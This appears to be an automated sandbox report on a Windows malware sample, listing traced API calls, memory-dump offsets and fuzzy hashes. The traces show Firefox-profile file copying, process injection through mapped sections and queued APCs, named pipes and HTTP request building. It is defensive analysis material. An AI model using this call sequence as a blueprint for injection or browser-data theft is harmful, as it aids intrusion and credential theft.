    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
